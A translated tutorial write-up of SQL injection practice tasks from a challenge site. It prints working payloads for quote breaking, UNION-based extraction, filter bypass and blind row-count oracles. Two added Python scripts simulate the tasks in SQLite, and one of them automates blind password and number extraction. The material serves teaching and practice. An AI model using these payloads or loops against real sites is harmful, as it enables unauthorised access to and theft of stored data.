
Solving SQL injection tasks from alexbers.com/sql

I want to share with the Habrahabr readers my own solutions to the SQL injection tasks on the alexbers website.

Example 1: www.alexbers.com/sql/1.php


This one is not really an exploitation task: you are simply asked to write a query against a table and a user you already know.
 Given:
 Table: users
 Fields: id, login, pass

Solution:
 select * from users where id = '12'

and the link will look like this:
  https://www.alexbers.com/sql/1.php?text=select+*+from+use+++ID%3D%2712%27

The query just uses the data we are given.

Example 2: www.alexbers.com/sql/qnbutn2.php


We are shown the query:
 select * from users where id = 2 or login = '$text'

Given:
 Table: users
 Fields: id, login, pass
 Requirement: Hooray, I know the answer (the password of the user with id = 9):

This example shows the most primitive vulnerability: the input is not filtered at all, so we can use quotes:
 https://www.alexbers.com/sql/qnbutn2.php?text=-1' or id='9

What have we done? We turned the query into this:
 select * from users where id = 2 or login = '-1' or id = '9'

The leading quote of our payload closes the string opened by the original query, and the original closing quote closes the string we open after id =. The query now selects users with id=2 or login='-1' or id='9'. No user with login -1 exists, so that condition matches nothing, but id=9 does exist. As a result we get two rows: the user with id=2 and the user with id=9.

Example 3: www.alexbers.com/sql/sdjjy3.php


The query is shown again:
 select * from users where id = 2 or login = '$text' limit 1

Given:
 Table: users
 Fields: id, login, pass
 Requirement: Hooray, I know the answer (the password of the user with id = 13):

The difference from the previous example is that output is limited to one row, so the id=2 row would always be the one displayed. The way around it is a comment that cuts off the rest of the statement, so the limit clause is never processed.

Solution:
 https://www.alexbers.com/sql/sdjjy3.php?text=-1' or id=13 -- 123

Resulting query:
 select * from users where id = 2 or login = '-1' or id = 13 -- 123' limit 1

Everything after the comment marker is ignored, so the limit is thrown out and the user with id = 13 is returned alongside id = 2.

Example 4: www.alexbers.com/sql/qjqhweh4.php



Query:
 select * from users where id = 2 or login = '$text' limit 1

Given:
 Tables: users, secret
 Fields: id, login, pass in users. The secret table has 3 fields.
 Requirement: Hooray, I know the answer (the row of the secret table where the field ggg = abc):

A bit more interesting. Now there are two tables, and the query does not run against the one we need. We use the classic way: MySQL's UNION operator appends the result of a second query to the first one. For the two results to be merged, both queries must return the same number of columns. According to the task we need the row of secret where ggg=abc. Both tables have three columns, so select * on secret lines up with select * on users, and the query will look like:

Query:
 https://www.alexbers.com/sql/qjqhweh4.php?text=-1' union select * from secret where ggg='abc' -- 123

One of the returned rows is the answer to the level.

Example 5: www.alexbers.com/sql/sdfkjsdk5.php



Query:
 select * from users where id = 2 or login = '$text' limit 1

Given:
 Tables: users, secret
 Fields: id, login, pass in users. The secret table has 2 fields.
 Requirement: Hooray, I know the answer (the contents of the secret table):

Let's try to repeat the previous example. The users table has three columns and secret has two, so select * from secret can no longer be unioned directly: the column counts differ, and the union has to be built differently. First we learn the column names of secret from information_schema, padding the union with constants so that it also returns three columns:
 https://www.alexbers.com/sql/sdfkjsdk5.php?text=1' union select 1, concat_ws(0x3a, table_name, column_name), 3 from information_schema.columns where table_name='secret' -- 123

This tells us that secret has two columns; we extract their values, again padding with a constant:
 https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1' union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret -- 123

We see the answer.
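The mechanics of examples 2 to 5 (a quote that closes the original string, a comment that removes the limit clause, and a UNION that only works when the column counts match), as an added example that is not code from the article or from alexbers.com. It stands in for the MySQL challenge pages with an in-memory SQLite database: the table shapes follow the tasks, but the row contents and the column names of secret (ggg, hhh) are constructed here, and SQLite's sqlite_master takes the place of MySQL's information_schema.columns for reading the schema. The parameterised query at the end shows why the same payload does nothing against a properly written page.

```python
import sqlite3

# Constructed stand-in for the challenge pages of examples 2 to 5.
# Row contents and the column names of `secret` are made up for this demo.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table users (id integer, login text, pass text);
        insert into users values (2, 'admin', 'pw-2'), (9, 'bob', 'pw-9'),
                                 (13, 'carol', 'pw-13');
        create table secret (ggg text, hhh text);
        insert into secret values ('abc', 'flag{example}');
    """)
    return db

def run_unsafe(db, text, limit1=False):
    """The vulnerable page: $text is pasted into the SQL string unescaped."""
    sql = f"select * from users where id = 2 or login = '{text}'"
    if limit1:
        sql += " limit 1"
    return db.execute(sql).fetchall()

def run_safe(db, text, limit1=False):
    """The fix: the value is bound as a parameter and never parsed as SQL."""
    sql = "select * from users where id = 2 or login = ?"
    if limit1:
        sql += " limit 1"
    return db.execute(sql, (text,)).fetchall()

def ids(rows):
    return sorted(r[0] for r in rows)

# Example 2: the payload's quote closes the original string and the original
# closing quote closes ours, so id='9' becomes a second condition.
def task2(db):
    return ids(run_unsafe(db, "-1' or id='9"))                    # [2, 9]

# Example 3 without a comment: limit 1 hides id=13 behind id=2.
def task3_limited(db):
    return ids(run_unsafe(db, "-1' or id='13", limit1=True))      # [2]

# Example 3: the comment swallows the trailing quote and the limit clause.
def task3(db):
    return ids(run_unsafe(db, "-1' or id=13 -- 123", limit1=True))  # [2, 13]

# Examples 4/5: a UNION needs the same column count on both sides; users has
# three columns and secret has two, so select * from secret is rejected.
def union_column_mismatch(db):
    try:
        run_unsafe(db, "-1' union select * from secret -- 123", limit1=True)
        return False
    except sqlite3.Error:
        return True

# Example 5: pad the union with constants and read the schema. The page uses
# information_schema.columns (MySQL); SQLite keeps the CREATE statement text
# in sqlite_master instead.
def task5_columns(db):
    rows = run_unsafe(db, "-1' union select 1, sql, 3 from sqlite_master "
                          "where name='secret' -- 123", limit1=True)
    return [r[1] for r in rows if r[0] == 1][0]

def task5_dump(db):
    rows = run_unsafe(db, "-1' union select 1, ggg, hhh from secret -- 123",
                      limit1=True)
    return [(r[1], r[2]) for r in rows if r[0] == 1]

# The same payload against the parameterised query matches no login, so only
# the hard-coded id=2 row comes back.
def safe_lookup(db):
    return ids(run_safe(db, "-1' or id='9"))                      # [2]

if __name__ == "__main__":
    db = make_db()
    print(task2(db), task3_limited(db), task3(db))
    print(union_column_mismatch(db), task5_columns(db), task5_dump(db))
    print(safe_lookup(db))
```

Running the file prints the ids each payload returns; the point to take away is that the parameterised version returns the same single row no matter what is typed, because the quote in the input never reaches the SQL parser.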

Example 6: www.alexbers.com/sql/skldj6



Query:
 select * from users where id = $text limit 1

Given:
 Tables: users
 Fields: id, login, pass in users.
 Quotes are filtered, and only one row is output from the database.
 Requirement: Hooray, I know the answer (the password of the user with the nickname god):

Here we see a misunderstanding of what mysql_real_escape_string protects against: it escapes quotes, but the id value is not placed in quotes, so the injection never needs a quote in the first place. The quotes can be filtered fifty times over and it does not matter. Where a string is needed, it can be written with the CHAR() function or as a hex literal (0x676f64 is 'god'). Since id = -1 matches nothing, the row from our union is the one that fits into limit 1:
 https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64


Example 7: www.alexbers.com/sql/dsfhsdjkf7.php



Given:
 Tables: users
 Fields: id, login, pass in users. Now only the first row of the result is ever displayed (the rest are not shown).
 Filtered characters: ', ", +, =, comma, space, brackets
 Requirement: Hooray, I know the answer (the password of the user whose nickname contains gentoo):

Query:
 select * from users where id = $text limit 1

Since the query already runs against the table we need, we do not even need a second query. Spaces are replaced with comments (/**/ or /*!*/), which MySQL treats as whitespace. Only one problem remains: the equals sign is filtered. It can be replaced with the LIKE operator. Comparing with a string would need quotes, so we encode the string as hex. We also do not know the exact nickname, only that it contains gentoo, so we use a pattern match with % wildcards: 0x2567656e746f6f25 is '%gentoo%'. The final attack vector looks like this:
 https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25


Example 8: www.alexbers.com/sql/qqqwwweeerrr8.php



Query:
 select * from users where id = $text

Given:
 Tables: users
 Fields: id, login, pass in users.
 Hint: no error messages will be shown.
 Requirement: Hooray, I know the answer (the password of the user with the nickname fast)

All we get back from this page is either an indication that an error occurred or the number of rows displayed. The row count is the only value we can influence, so it becomes our channel. We need a password, which is a string of letters and digits, while the channel carries only numbers, so the password has to be read out as numbers. If we convert each character to its ASCII code, every character of the password becomes a number. We cut out one character with mid() and convert it with ascii(); the attack vector looks like this:
 https://www.alexbers.com/sql/qqqwwweeerrr8.php?text=-1 or id <= (select ascii(mid(pass,1,1)) from users where login='fast')

The condition id <= N matches every row whose id is at most N, so (with ids numbered consecutively from 1) the number of rows displayed equals the ASCII code of the first character of the password. We then repeat the request for the second character, and so on.

Example 9: www.alexbers.com/sql/almost9.php



 Tables: users
 Fields: id, login, pass in users.
 Query: select * from users where id = $text
 Requirement: "Hooray, I know the answer (the numeric sum of the user logins with 20 <= id <= 30)".

That is, we need to take the numeric value of each login, add them up, and read the sum through the same row-count comparison as in the previous example. The table holds 1069 rows in total, so a sum larger than that cannot be read in a single request: id <= N can never match more than 1069 rows. The attack is therefore split into two requests, one for the sum divided by 10 and one for the remainder:
 https://www.alexbers.com/sql/almost9.php?text=-1 or id <= cast((select sum(login) from users where id between 20 and 30) as signed integer) / 10
 https://www.alexbers.com/sql/almost9.php?text=-1 or id <= mod(cast((select sum(login) from users where id between 20 and 30) as signed integer), 10)

The first row count gives the sum without its last digit, the second gives the last digit.
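The row-count oracle of examples 8 and 9 as a working loop, an added example that is not code from the article or from alexbers.com. It simulates the page with an in-memory SQLite table; the page says nothing about the data, so 200 rows with contiguous ids, a user named fast at id 42 and its password are constructed here. SQLite has no mid() or ascii(), so the payloads use its substr() and unicode() instead; the MySQL spelling from the article is noted in the comments. The number reader goes beyond the article's two hand-written requests: it keeps dividing by 10 until the quotient is zero, so it recovers a value of any size, not just one that fits in two digits past the row count.

```python
import sqlite3

# Constructed stand-in for the pages of examples 8 and 9: 200 rows with
# contiguous ids, the target user 'fast' and its password are made up here.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer primary key, login text, pass text)")
    db.executemany("insert into users values (?, ?, ?)",
                   [(i, f"user{i}", f"pw{i}") for i in range(1, 201)])
    db.execute("update users set login = 'fast', pass = 'Qz9!' where id = 42")
    return db

def row_count(db, text):
    """The oracle: no error text, only how many rows the page displayed."""
    sql = f"select * from users where id = {text}"
    try:
        return len(db.execute(sql).fetchall())
    except sqlite3.Error:
        return 0          # an error shows nothing, same as zero rows

def extract_password(db, login):
    """Example 8: id <= ascii(char) matches exactly that many rows, provided
    ids run 1, 2, 3, ... beyond 127. MySQL spelling: ascii(mid(pass, i, 1));
    SQLite spelling: unicode(substr(pass, i, 1)). Past the end of the string
    the subquery yields NULL (0 in MySQL), no rows match, and the loop ends."""
    out, pos = "", 1
    while True:
        code = row_count(db, f"-1 or id <= (select unicode(substr(pass, {pos}, 1)) "
                             f"from users where login = '{login}')")
        if code == 0:
            return out
        out += chr(code)
        pos += 1

def extract_number(db, expr):
    """Example 9, generalised: read an integer SQL expression one decimal
    digit at a time, least significant first, so a value larger than the row
    count can still be recovered. The article does this by hand with sum/10
    and sum mod 10; here the loop runs until the quotient is zero.
    `/` is integer division in SQLite; MySQL would give 27.5, but id <= 27.5
    matches 27 rows just the same, so the payload shape carries over."""
    value, place = 0, 0
    while True:
        quotient = f"(({expr}) / {10 ** place})"
        if row_count(db, f"-1 or id <= {quotient}") == 0:
            return value
        digit = row_count(db, f"-1 or id <= {quotient} % 10")
        value += digit * 10 ** place
        place += 1

if __name__ == "__main__":
    db = make_db()
    print(extract_password(db, "fast"))        # Qz9!
    # sum of ids 20..30 is 275, more than the 200 rows in the table, so it
    # cannot be read with a single id <= N comparison
    print(extract_number(db, "select sum(id) from users where id between 20 and 30"))
```

Each character costs one request and each digit costs two (one to test whether anything is left, one for the digit itself); against a real target the same loops would wrap an HTTP client around the page and count the rows in the response instead of calling sqlite3.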

Example 10



The solution of the 10th problem is already described on YouTube, you can see it here: www.youtube.com/watch?v=dLSxTGvwcLw

Source: https://habr.com/ru/post/253885/

